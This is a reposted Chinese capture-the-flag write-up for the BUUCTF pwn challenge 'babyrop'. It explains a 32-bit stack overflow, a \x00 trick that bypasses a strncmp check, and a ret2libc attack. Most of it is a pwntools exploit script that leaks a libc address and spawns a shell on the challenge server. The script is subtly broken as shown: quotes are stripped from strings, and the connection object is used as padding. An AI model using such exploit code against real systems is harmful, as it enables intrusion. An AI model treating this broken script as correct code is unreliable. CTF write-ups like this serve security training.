码迷,mamicode.com
首页 > 其他好文 > 详细

BUUCTF-pwn babyrop

时间:2020-07-28 14:41:31      阅读:117      评论:0      收藏:0      [点我收藏+]

标签:load   ctf   code   address   图片   lib   inter   info   tar   

简单的32位rop

技术图片

 

 读取随机数并传入。sub_804871F的返回值作为sub_80487D0的参数

技术图片

第二个read就是溢出点

技术图片

 

 

 strncmp对我们输入的内容和随机数进行了的比较,通过\x00终止strlen函数来绕过后面的strncmp。

之后就可以进行正常的rop

技术图片

 

计算覆盖v5的偏移0x2c-0x25=0x7

技术图片

 

 

通过泄露地址寻找libc ,得到system和/bin/sh

exp:

from pwn import *
from LibcSearcher import *
a=remote("node3.buuoj.cn",25389)
elf=ELF("babyrop")
#libc=ELF("libc-2.23.so")
write_plt=elf.plt[write]
puts_got=elf.got[puts]
start=0x080485A0
main=0x08048825

#leak_address
payload="\x00"+"\xff"*(0x2c-0x25)
a.sendline(payload)
a.recvuntil("Correct\n")
payload2=a*0xE7+a*4+p32(write_plt)+p32(start)+p32(1)+p32(puts_got)+p32(4)
a.send(payload2)
puts_got=u32(a.recv(4))

#find base
libc=LibcSearcher(puts,puts_got)
base=puts_got-libc.dump(puts)
system=base+libc.dump(system)
binsh=base+libc.dump(str_bin_sh)

payload="\x00"+"\xff"*(0x2c-0x25)


a.sendline(payload)
a.recvuntil("Correct\n")
payload2=a*0xE7+a*4+p32(system)+p32(0)+p32(binsh)
a.sendline(payload2)
a.interactive()

 

BUUCTF-pwn babyrop

标签:load   ctf   code   address   图片   lib   inter   info   tar   

原文地址:https://www.cnblogs.com/remon535/p/13390332.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!